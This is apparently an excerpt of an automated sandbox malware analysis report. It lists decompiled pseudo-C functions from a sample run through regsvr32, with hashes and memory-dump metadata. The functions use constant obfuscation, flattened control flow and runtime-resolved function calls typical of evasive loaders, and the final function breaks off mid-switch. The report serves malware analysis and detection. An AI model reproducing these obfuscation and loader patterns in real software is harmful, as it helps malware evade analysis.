                                                                                                                					_t133 =  *_t132;
                                                                                                                					if(_t133 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t133 + 0x14)) == 0) {
                                                                                                                						L4:
                                                                                                                						 *_t132 =  *((intOrPtr*)(_t133 + 0x3c));
                                                                                                                						_t113 = E001B17D2(_v56, _v12, _t133);
                                                                                                                					} else {
                                                                                                                						_t113 = E001A79CC( *((intOrPtr*)(_t133 + 4)), _v20, _t117, _v24, _v48, _v52);
                                                                                                                						_t135 =  &(_t135[4]);
                                                                                                                						if(_t113 != _v44) {
                                                                                                                							_t104 = _t133 + 0x3c; // 0x2b51e999
                                                                                                                							_t132 = _t104;
                                                                                                                						} else {
                                                                                                                							 *((intOrPtr*)(_t133 + 0xc))( *((intOrPtr*)(_t133 + 0x14)), 0, 0);
                                                                                                                							E001C1BE6(_v48,  *((intOrPtr*)(_t133 + 0x14)), _v52);
                                                                                                                							E001B02D8( *((intOrPtr*)(_t133 + 4)), _v40, _v28, _v44);
                                                                                                                							_t135 =  &(_t135[3]);
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t113;
                                                                                                                			}

























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Ez$m}.
                                                                                                                • API String ID: 0-3270494409
                                                                                                                • Opcode ID: cad2a70dc0f0926579b0b4c27cf0ae496e8c25688f035e9ced31f10c32d6d060
                                                                                                                • Instruction ID: 093893d2574b734563d255bcde43a24826f488bc55b12a17b100fe7e968fa5e4
                                                                                                                • Opcode Fuzzy Hash: cad2a70dc0f0926579b0b4c27cf0ae496e8c25688f035e9ced31f10c32d6d060
                                                                                                                • Instruction Fuzzy Hash: 4851EE710093419FC798DF25D58980BBBF1FBD9758F809A1DF496A6260C3B0EA098F96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001BFAD1() {
                                                                                                                				signed char _v2;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				char _v284;
                                                                                                                				signed short _v320;
                                                                                                                				intOrPtr _v324;
                                                                                                                				intOrPtr _v328;
                                                                                                                				signed int _v332;
                                                                                                                				signed int _v336;
                                                                                                                				signed int _v340;
                                                                                                                				signed int _v344;
                                                                                                                				signed int _v348;
                                                                                                                				signed int _v352;
                                                                                                                				void* _t87;
                                                                                                                				signed int _t100;
                                                                                                                				signed int _t101;
                                                                                                                				signed int _t102;
                                                                                                                				intOrPtr _t104;
                                                                                                                				signed int* _t106;
                                                                                                                
                                                                                                                				_t106 =  &_v352;
                                                                                                                				_v328 = 0x680e43;
                                                                                                                				_t104 = 0;
                                                                                                                				_t87 = 0x45a3892;
                                                                                                                				_v324 = 0;
                                                                                                                				_v340 = 0x7ab44a;
                                                                                                                				_v340 = _v340 + 0xffff1f85;
                                                                                                                				_t100 = 0x4c;
                                                                                                                				_v340 = _v340 / _t100;
                                                                                                                				_v340 = _v340 ^ 0x0002e2d7;
                                                                                                                				_v352 = 0x29d857;
                                                                                                                				_t101 = 0x23;
                                                                                                                				_v352 = _v352 * 0x3e;
                                                                                                                				_v352 = _v352 >> 0xe;
                                                                                                                				_v352 = _v352 >> 0x10;
                                                                                                                				_v352 = _v352 ^ 0x000fb3ba;
                                                                                                                				_v332 = 0x23539f;
                                                                                                                				_v332 = _v332 << 1;
                                                                                                                				_v332 = _v332 ^ 0x0049ed7a;
                                                                                                                				_v336 = 0xdc95a7;
                                                                                                                				_v336 = _v336 << 4;
                                                                                                                				_v336 = _v336 ^ 0x0dce7c82;
                                                                                                                				_v344 = 0x96fb4d;
                                                                                                                				_v344 = _v344 ^ 0x46ce857e;
                                                                                                                				_v344 = _v344 / _t101;
                                                                                                                				_v344 = _v344 ^ 0x020b2d03;
                                                                                                                				_v348 = 0x1333ff;
                                                                                                                				_v348 = _v348 + 0x8c2e;
                                                                                                                				_v348 = _v348 + 0xffffe08c;
                                                                                                                				_t102 = 0x57;
                                                                                                                				_v348 = _v348 / _t102;
                                                                                                                				_v348 = _v348 ^ 0x000c9b9c;
                                                                                                                				do {
                                                                                                                					while(_t87 != 0x4f0453) {
                                                                                                                						if(_t87 == 0x201b8ca) {
                                                                                                                							_t87 = 0x4f0453;
                                                                                                                							_t104 = _t104 + _v280 * 0x3e8;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t87 == 0x410ff33) {
                                                                                                                								_v284 = 0x11c;
                                                                                                                								E001AC0BA(_v340, _v352,  &_v284);
                                                                                                                								_t87 = 0xc335a88;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t87 == 0x45a3892) {
                                                                                                                									_t87 = 0x410ff33;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t87 == 0x4cd0df1) {
                                                                                                                										_t87 = 0x201b8ca;
                                                                                                                										_t104 = _t104 + (_v2 & 0x000000ff) * 0x186a0;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t87 == 0x956385b) {
                                                                                                                											_t104 = _t104 + (_v320 & 0x0000ffff);
                                                                                                                										} else {
                                                                                                                											if(_t87 != 0xc335a88) {
                                                                                                                												goto L14;
                                                                                                                											} else {
                                                                                                                												E001AD3BF(_v332, _v336, _v344,  &_v320, _v348);
                                                                                                                												_t106 =  &(_t106[3]);
                                                                                                                												_t87 = 0x4cd0df1;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L17:
                                                                                                                						return _t104;
                                                                                                                					}
                                                                                                                					_t87 = 0x956385b;
                                                                                                                					_t104 = _t104 + _v276 * 0x64;
                                                                                                                					L14:
                                                                                                                				} while (_t87 != 0x9fe4a63);
                                                                                                                				goto L17;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [8V$zI
                                                                                                                • API String ID: 0-7124573
                                                                                                                • Opcode ID: 7ee5508a42d793d338c3a3453ab651a2523bc2996baf11e9e386dead470e74bc
                                                                                                                • Instruction ID: 2f9762e10521fecd716c7ab76e0fc6d1418c650463df94868bfb1ef23886ffc9
                                                                                                                • Opcode Fuzzy Hash: 7ee5508a42d793d338c3a3453ab651a2523bc2996baf11e9e386dead470e74bc
                                                                                                                • Instruction Fuzzy Hash: A141CF715083068FD318CF25D99496FBBE2FBC4718F10892EF98697250D3B4DA4A8B83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B3094(void* __eflags) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				char _v48;
                                                                                                                				short _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				char _v576;
                                                                                                                				intOrPtr* _t107;
                                                                                                                				signed int _t111;
                                                                                                                				signed int _t112;
                                                                                                                				signed int _t113;
                                                                                                                
                                                                                                                				_v56 = 0x1a0f6;
                                                                                                                				_v48 = 0;
                                                                                                                				_v52 = 0;
                                                                                                                				_v20 = 0xf0813e;
                                                                                                                				_v20 = _v20 << 9;
                                                                                                                				_t111 = 0x7f;
                                                                                                                				_v20 = _v20 * 0x35;
                                                                                                                				_v20 = _v20 ^ 0x9587c5d6;
                                                                                                                				_v12 = 0x2ff68;
                                                                                                                				_v12 = _v12 + 0x3637;
                                                                                                                				_v12 = _v12 + 0xffffc8fe;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 ^ 0x00003ff4;
                                                                                                                				_v16 = 0xe7eb51;
                                                                                                                				_v16 = _v16 * 0x35;
                                                                                                                				_v16 = _v16 << 0xf;
                                                                                                                				_v16 = _v16 ^ 0x75fd2a3c;
                                                                                                                				_v16 = _v16 ^ 0xae1a8b0c;
                                                                                                                				_v36 = 0x639668;
                                                                                                                				_v36 = _v36 | 0xacdefd33;
                                                                                                                				_v36 = _v36 ^ 0xacf85737;
                                                                                                                				_v8 = 0x632eec;
                                                                                                                				_v8 = _v8 << 8;
                                                                                                                				_t112 = 0x4c;
                                                                                                                				_v8 = _v8 / _t111;
                                                                                                                				_v8 = _v8 + 0xaae6;
                                                                                                                				_v8 = _v8 ^ 0x00c079da;
                                                                                                                				_v28 = 0xa6b509;
                                                                                                                				_v28 = _v28 / _t112;
                                                                                                                				_v28 = _v28 + 0xfcd;
                                                                                                                				_v28 = _v28 ^ 0x00071c8b;
                                                                                                                				_v24 = 0x2ed0d;
                                                                                                                				_v24 = _v24 << 3;
                                                                                                                				_v24 = _v24 * 0x4d;
                                                                                                                				_v24 = _v24 ^ 0x0705ed46;
                                                                                                                				_v40 = 0x280fc8;
                                                                                                                				_v40 = _v40 + 0xffff47a2;
                                                                                                                				_v40 = _v40 ^ 0x002e9d56;
                                                                                                                				_v44 = 0xbfc35a;
                                                                                                                				_v44 = _v44 + 0xffff329d;
                                                                                                                				_v44 = _v44 ^ 0x00b8ce5f;
                                                                                                                				_v32 = 0x17d77d;
                                                                                                                				_v32 = _v32 ^ 0x4bb6603c;
                                                                                                                				_v32 = _v32 ^ 0x4ba57b24;
                                                                                                                				_t113 = _v20;
                                                                                                                				if(E001B3C24(_t113,  &_v576, _v12, _v16) != 0) {
                                                                                                                					_t107 =  &_v576;
                                                                                                                					if(_v576 != 0) {
                                                                                                                						while( *_t107 != 0x5c) {
                                                                                                                							_t107 = _t107 + 2;
                                                                                                                							if( *_t107 != 0) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                							}
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                						_t113 = 0;
                                                                                                                						 *((short*)(_t107 + 2)) = 0;
                                                                                                                					}
                                                                                                                					L6:
                                                                                                                					_push(_t113);
                                                                                                                					E001B660B(_v36, _v8,  &_v48,  &_v576, _v28, _t113, _t113, _v24, _v40, _t113, _t113, _v44, _v32);
                                                                                                                				}
                                                                                                                				return _v48;
                                                                                                                			}
                                                                                                                0x001b31ac
                                                                                                                0x001b31b3
                                                                                                                0x001b31ba
                                                                                                                0x001b31c7
                                                                                                                0x001b31d5
                                                                                                                0x001b31d7
                                                                                                                0x001b31e4
                                                                                                                0x001b31e6
                                                                                                                0x001b31ec
                                                                                                                0x001b31f2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b31f4
                                                                                                                0x00000000
                                                                                                                0x001b31f2
                                                                                                                0x001b31f6
                                                                                                                0x001b31f8
                                                                                                                0x001b31f8
                                                                                                                0x001b31fc
                                                                                                                0x001b31fc
                                                                                                                0x001b3221
                                                                                                                0x001b3226
                                                                                                                0x001b3230

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Q$.c
                                                                                                                • API String ID: 0-2625308445
                                                                                                                • Opcode ID: 0b7d7f54afde24db4bd51453a3d3c7343f1ebadcef81c582e73d1cfa7f7e7fd7
                                                                                                                • Instruction ID: 69f1d0a3fa542b774d9138d38f601916b6bdd829b25bd98cb4917696e420cb10
                                                                                                                • Opcode Fuzzy Hash: 0b7d7f54afde24db4bd51453a3d3c7343f1ebadcef81c582e73d1cfa7f7e7fd7
                                                                                                                • Instruction Fuzzy Hash: 4B41F1B1C0121DEBDF14CFA4C98A8EEBBB5FB04304F208199D121B6260E3B95B54DFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E001BF7F4(intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				void* _t94;
                                                                                                                				void* _t96;
                                                                                                                				intOrPtr* _t97;
                                                                                                                				signed int _t100;
                                                                                                                				signed int _t101;
                                                                                                                				signed int _t102;
                                                                                                                				intOrPtr _t115;
                                                                                                                
                                                                                                                				_v12 = 0xcca755;
                                                                                                                				_v12 = _v12 ^ 0x1e26665c;
                                                                                                                				_v12 = _v12 | 0x17f7bcc9;
                                                                                                                				_v12 = _v12 ^ 0x1ff1351a;
                                                                                                                				_v36 = 0x622835;
                                                                                                                				_v36 = _v36 << 0xf;
                                                                                                                				_v36 = _v36 ^ 0x141f023e;
                                                                                                                				_v40 = 0xdf80cb;
                                                                                                                				_t100 = 0xb;
                                                                                                                				_v40 = _v40 / _t100;
                                                                                                                				_v40 = _v40 ^ 0x001bc7be;
                                                                                                                				_v20 = 0x9d4900;
                                                                                                                				_t101 = 0x31;
                                                                                                                				_v20 = _v20 / _t101;
                                                                                                                				_v20 = _v20 >> 1;
                                                                                                                				_v20 = _v20 ^ 0x000516ac;
                                                                                                                				_v16 = 0x22bcd0;
                                                                                                                				_v16 = _v16 << 9;
                                                                                                                				_v16 = _v16 ^ 0x9b9668fc;
                                                                                                                				_v16 = _v16 ^ 0xdeea632e;
                                                                                                                				_v32 = 0x6d2532;
                                                                                                                				_v32 = _v32 >> 0xb;
                                                                                                                				_v32 = _v32 + 0xffff364a;
                                                                                                                				_v32 = _v32 ^ 0xfffd51d5;
                                                                                                                				_v28 = 0x501981;
                                                                                                                				_v28 = _v28 >> 0xc;
                                                                                                                				_v28 = _v28 + 0xffff5696;
                                                                                                                				_v28 = _v28 ^ 0xfff98fb8;
                                                                                                                				_v24 = 0xe38074;
                                                                                                                				_v24 = _v24 + 0xffff46dd;
                                                                                                                				_t102 = 0x35;
                                                                                                                				_t115 = _a4;
                                                                                                                				_v24 = _v24 * 0x5d;
                                                                                                                				_v24 = _v24 ^ 0x526bbbf2;
                                                                                                                				_v8 = 0x551580;
                                                                                                                				_v8 = _v8 / _t102;
                                                                                                                				_v8 = _v8 << 4;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 ^ 0x000bcc63;
                                                                                                                				_t94 =  *((intOrPtr*)(_t115 + 0xc))( *((intOrPtr*)(_t115 + 0x14)), 1, 0);
                                                                                                                				_t122 = _t94;
                                                                                                                				if(_t94 != 0) {
                                                                                                                					_push(_v36);
                                                                                                                					_t96 = E001AE4F5(_v12, 0x1a11d8, _t122);
                                                                                                                					_push(_v16);
                                                                                                                					_t117 = _t96;
                                                                                                                					_push( *((intOrPtr*)(_t115 + 0x14)));
                                                                                                                					_push(_t96);
                                                                                                                					_t97 = E001A9343(_v40, _v20);
                                                                                                                					if(_t97 != 0) {
                                                                                                                						 *_t97();
                                                                                                                					}
                                                                                                                					E001BF94B(_t117, _v32, _v28, _v24, _v8);
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2%m$5(b
                                                                                                                • API String ID: 0-1732443568
                                                                                                                • Opcode ID: 2236f85df998c9117053d2c1eac68e4196a1c09e67b72bf3059920d1a50e59e1
                                                                                                                • Instruction ID: 3e2899e1ac0c4c14c189a5b723c3bd207470f54e9654149a0e7f57b6643c7411
                                                                                                                • Opcode Fuzzy Hash: 2236f85df998c9117053d2c1eac68e4196a1c09e67b72bf3059920d1a50e59e1
                                                                                                                • Instruction Fuzzy Hash: 20414471D0020AEBCF08CFA1D94A5EEBBB1FF54704F208059E911B6290D7B25B56CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E1001B9A4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				unsigned int _t147;
                                                                                                                				signed int _t149;
                                                                                                                				signed int* _t152;
                                                                                                                				intOrPtr _t159;
                                                                                                                				intOrPtr* _t160;
                                                                                                                				unsigned int _t163;
                                                                                                                				unsigned int _t166;
                                                                                                                				signed int* _t170;
                                                                                                                				signed int* _t173;
                                                                                                                				unsigned int _t177;
                                                                                                                				unsigned int _t181;
                                                                                                                				unsigned int _t185;
                                                                                                                				signed int _t189;
                                                                                                                				signed int* _t194;
                                                                                                                				signed int _t195;
                                                                                                                				unsigned int _t196;
                                                                                                                				intOrPtr* _t197;
                                                                                                                				unsigned int _t198;
                                                                                                                				signed int _t213;
                                                                                                                				signed int _t217;
                                                                                                                				unsigned int _t224;
                                                                                                                				void* _t225;
                                                                                                                
                                                                                                                				_t200 = __ecx;
                                                                                                                				_push(0x70);
                                                                                                                				E1003D1E6(E1005301F, __ebx, __edi, __esi);
                                                                                                                				_t222 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t225 - 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
                                                                                                                				_t189 =  *(_t225 + 8);
                                                                                                                				 *(_t225 - 4) = 0;
                                                                                                                				if(_t189 != 0x111) {
                                                                                                                					__eflags = _t189 - 0x4e;
                                                                                                                					if(_t189 != 0x4e) {
                                                                                                                						__eflags = _t189 - 6;
                                                                                                                						_t224 =  *(_t225 + 0x10);
                                                                                                                						if(_t189 == 6) {
                                                                                                                							E1001B373(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E10019C16(_t189, __ecx, _t225, _t224));
                                                                                                                						}
                                                                                                                						__eflags = _t189 - 0x20;
                                                                                                                						if(_t189 != 0x20) {
                                                                                                                							L12:
                                                                                                                							_t147 =  *(_t222 + 0x4c);
                                                                                                                							__eflags = _t147;
                                                                                                                							if(_t147 == 0) {
                                                                                                                								L20:
                                                                                                                								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
                                                                                                                								 *(_t225 + 0x10) = _t149;
                                                                                                                								E1001884C(_t225 - 0x14, _t222, 7);
                                                                                                                								_t194 = 0x1006f148 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
                                                                                                                								__eflags =  *(_t225 + 8) -  *_t194;
                                                                                                                								 *(_t225 - 0x18) = _t194;
                                                                                                                								if( *(_t225 + 8) !=  *_t194) {
                                                                                                                									L25:
                                                                                                                									_t152 =  *(_t225 - 0x18);
                                                                                                                									_t195 =  *(_t225 + 0x10);
                                                                                                                									 *_t152 =  *(_t225 + 8);
                                                                                                                									_t152[2] = _t195;
                                                                                                                									while(1) {
                                                                                                                										__eflags =  *_t195;
                                                                                                                										if( *_t195 == 0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										__eflags =  *(_t225 + 8) - 0xc000;
                                                                                                                										_push(0);
                                                                                                                										_push(0);
                                                                                                                										if( *(_t225 + 8) >= 0xc000) {
                                                                                                                											_push(0xc000);
                                                                                                                											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
                                                                                                                											while(1) {
                                                                                                                												_t196 = E10017EC7();
                                                                                                                												__eflags = _t196;
                                                                                                                												if(_t196 == 0) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
                                                                                                                												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
                                                                                                                													( *(_t225 - 0x18))[1] = _t196;
                                                                                                                													E1001887B(_t225 - 0x14);
                                                                                                                													L102:
                                                                                                                													_t197 =  *((intOrPtr*)(_t196 + 0x14));
                                                                                                                													L103:
                                                                                                                													_push(_t224);
                                                                                                                													_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                                													L104:
                                                                                                                													_t159 =  *_t197();
                                                                                                                													L105:
                                                                                                                													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												_push(0);
                                                                                                                												_push(0);
                                                                                                                												_push(0xc000);
                                                                                                                												_t198 = _t196 + 0x18;
                                                                                                                												__eflags = _t198;
                                                                                                                												_push(_t198);
                                                                                                                											}
                                                                                                                											_t195 =  *(_t225 + 0x10);
                                                                                                                											L36:
                                                                                                                											_t195 =  *_t195();
                                                                                                                											 *(_t225 + 0x10) = _t195;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                										_push( *(_t225 + 8));
                                                                                                                										_push( *((intOrPtr*)(_t195 + 4)));
                                                                                                                										_t166 = E10017EC7();
                                                                                                                										__eflags = _t166;
                                                                                                                										 *(_t225 + 0x10) = _t166;
                                                                                                                										if(_t166 == 0) {
                                                                                                                											goto L36;
                                                                                                                										}
                                                                                                                										( *(_t225 - 0x18))[1] = _t166;
                                                                                                                										E1001887B(_t225 - 0x14);
                                                                                                                										L29:
                                                                                                                										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
                                                                                                                										__eflags = _t213 - 0x44;
                                                                                                                										if(__eflags > 0) {
                                                                                                                											goto L106;
                                                                                                                										}
                                                                                                                										switch( *((intOrPtr*)(_t213 * 4 +  &M1001BEBC))) {
                                                                                                                											case 0:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												_push(E10024520(__ebx, __ecx, __edi, __esi, __eflags));
                                                                                                                												goto L44;
                                                                                                                											case 1:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L44;
                                                                                                                											case 2:
                                                                                                                												__eax = __esi;
                                                                                                                												__eax = __esi >> 0x10;
                                                                                                                												__eflags = __eax;
                                                                                                                												_push(__eax);
                                                                                                                												__eax = __si & 0x0000ffff;
                                                                                                                												_push(__si & 0x0000ffff);
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												goto L49;
                                                                                                                											case 3:
                                                                                                                												_push(__esi);
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												goto L42;
                                                                                                                											case 4:
                                                                                                                												_push(__esi);
                                                                                                                												L44:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L105;
                                                                                                                											case 5:
                                                                                                                												__ecx = __ebp - 0x28;
                                                                                                                												E10023F76(__ebp - 0x28) =  *(__esi + 4);
                                                                                                                												__ecx = __ebp - 0x7c;
                                                                                                                												 *((char*)(__ebp - 4)) = 1;
                                                                                                                												 *(__ebp - 0x24) =  *(__esi + 4);
                                                                                                                												__eax = E10018895(__ecx, __eflags);
                                                                                                                												__eax =  *__esi;
                                                                                                                												__esi =  *(__esi + 8);
                                                                                                                												 *((char*)(__ebp - 4)) = 2;
                                                                                                                												 *(__ebp - 0x5c) = __eax;
                                                                                                                												__eax = E10019C3D(__ecx, __edi, __esi, __eflags, __eax);
                                                                                                                												__eflags = __eax;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													__eax =  *(__edi + 0x4c);
                                                                                                                													__eflags = __eax;
                                                                                                                													if(__eflags != 0) {
                                                                                                                														__ecx = __eax + 0x24;
                                                                                                                														__eax = E1002DAC9(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
                                                                                                                														__eflags = __eax;
                                                                                                                														if(__eflags != 0) {
                                                                                                                															 *(__ebp - 0x2c) = __eax;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													__eax = __ebp - 0x7c;
                                                                                                                												}
                                                                                                                												_push(__esi);
                                                                                                                												_push(__eax);
                                                                                                                												__eax = __ebp - 0x28;
                                                                                                                												_push(__ebp - 0x28);
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                                                                                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
                                                                                                                												__ecx = __ebp - 0x7c;
                                                                                                                												 *(__ebp - 0x10) = __ebp - 0x28;
                                                                                                                												 *((char*)(__ebp - 4)) = 1;
                                                                                                                												__eax = E1001A3E3(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
                                                                                                                												goto L59;
                                                                                                                											case 6:
                                                                                                                												__ecx = __ebp - 0x28;
                                                                                                                												E10023F76(__ebp - 0x28) =  *(__esi + 4);
                                                                                                                												_push( *(__esi + 8));
                                                                                                                												 *(__ebp - 0x24) =  *(__esi + 4);
                                                                                                                												__eax = __ebp - 0x28;
                                                                                                                												_push(__ebp - 0x28);
                                                                                                                												__ecx = __edi;
                                                                                                                												 *((char*)(__ebp - 4)) = 3;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												_t95 = __ebp - 0x24;
                                                                                                                												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
                                                                                                                												__eflags =  *_t95;
                                                                                                                												 *(__ebp - 0x10) = __ebp - 0x28;
                                                                                                                												L59:
                                                                                                                												__ecx = __ebp - 0x28;
                                                                                                                												 *((char*)(__ebp - 4)) = 0;
                                                                                                                												__eax = E100245A8(__ecx);
                                                                                                                												goto L106;
                                                                                                                											case 7:
                                                                                                                												__eax =  *(__ebp + 0xc);
                                                                                                                												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												__eflags = __eax;
                                                                                                                												_push(__eax);
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp, __esi);
                                                                                                                												goto L61;
                                                                                                                											case 8:
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												goto L42;
                                                                                                                											case 9:
                                                                                                                												goto L103;
                                                                                                                											case 0xa:
                                                                                                                												_push(__esi);
                                                                                                                												_push(E10022961(__ebx, __ecx, __edi, __esi, __eflags));
                                                                                                                												__eax =  *(__ebp + 0xc);
                                                                                                                												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												L61:
                                                                                                                												_push(__eax);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												L49:
                                                                                                                												_push(__eax);
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L105;
                                                                                                                											case 0xb:
                                                                                                                												_push(__esi);
                                                                                                                												goto L87;
                                                                                                                											case 0xc:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L90;
                                                                                                                											case 0xd:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L106;
                                                                                                                											case 0xe:
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												goto L81;
                                                                                                                											case 0xf:
                                                                                                                												__esi = __esi >> 0x10;
                                                                                                                												__eax = __ax;
                                                                                                                												_push(__ax);
                                                                                                                												__eax = __si;
                                                                                                                												goto L81;
                                                                                                                											case 0x10:
                                                                                                                												_push(__esi >> 0x10);
                                                                                                                												__eax = __si & 0x0000ffff;
                                                                                                                												goto L95;
                                                                                                                											case 0x11:
                                                                                                                												_push(E10019C16(__ebx, __ecx, __ebp, __esi));
                                                                                                                												L87:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L88;
                                                                                                                											case 0x12:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L105;
                                                                                                                											case 0x13:
